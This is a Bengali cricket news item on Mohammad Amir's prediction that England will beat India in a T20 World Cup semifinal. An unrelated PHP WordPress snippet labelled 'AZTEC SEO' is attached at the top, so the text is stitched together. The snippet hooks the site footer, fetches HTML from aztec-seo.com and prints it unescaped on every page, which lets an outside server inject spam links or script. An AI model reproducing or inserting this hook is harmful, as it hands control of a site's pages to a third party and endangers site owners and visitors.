/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
টি-টোয়েন্টি বিশ্বকাপের দ্বিতীয় সেমিফাইনালে আজ মুখোমুখি ভারত-ইংল্যান্ড। আজকের ম্যাচে ভারতকে হারিয়ে ফাইনালে উঠে যাবে ইংল্যান্ড ক্রিকেট দল। এমন ভবিষ্যদ্বাণী করেছেন পাকিস্তানের সাবেক তারকা পেসার মোহাদ আমির।
আমির বলেন, আজ মুম্বাইয়ের ওয়াংখেড়ের উইকেট ব্যাটিং সহায়ক। যদি ইংল্যান্ড পরে ব্যাট করে তাহলে ওদের জেতার সম্ভাবনা বেশি। ভারতের দুই এক জন ক্রিকেটারই ফর্মে রয়েছে।
তিনি আরও বলেন, ঈশান কিশন আমাদের বিরুদ্ধে ভালো খেলেছে। অভিষেক শর্মা ফর্মে নেই। তিলক বর্মা, সূর্যকুমার যাদবও সুপার এইটে বেশি রান পায়নি। সঞ্জু ভালো খেলেছে। বুমরাহও ভালো খেলছে। কিন্তু ভারত দল হিসেবে ভালো খেলছে না। তাই আমার মতে, আজ ইংল্যান্ডই জিতবে।
যদিও সুপার এইটের শেষ ম্যাচে আমিরের ভবিষ্যদ্বাণী সত্যি হয়নি। সেই ম্যাচে ওয়েস্ট ইন্ডিজকে হারিয়েছিল ভারত। এখন দেখা যাক সেমিফাইনালেও সাবেক পাকিস্তানি ক্রিকেটারের ভবিষ্যদ্বাণী সূর্যকুমারের ভুল প্রমাণিত করতে পারেন কি না।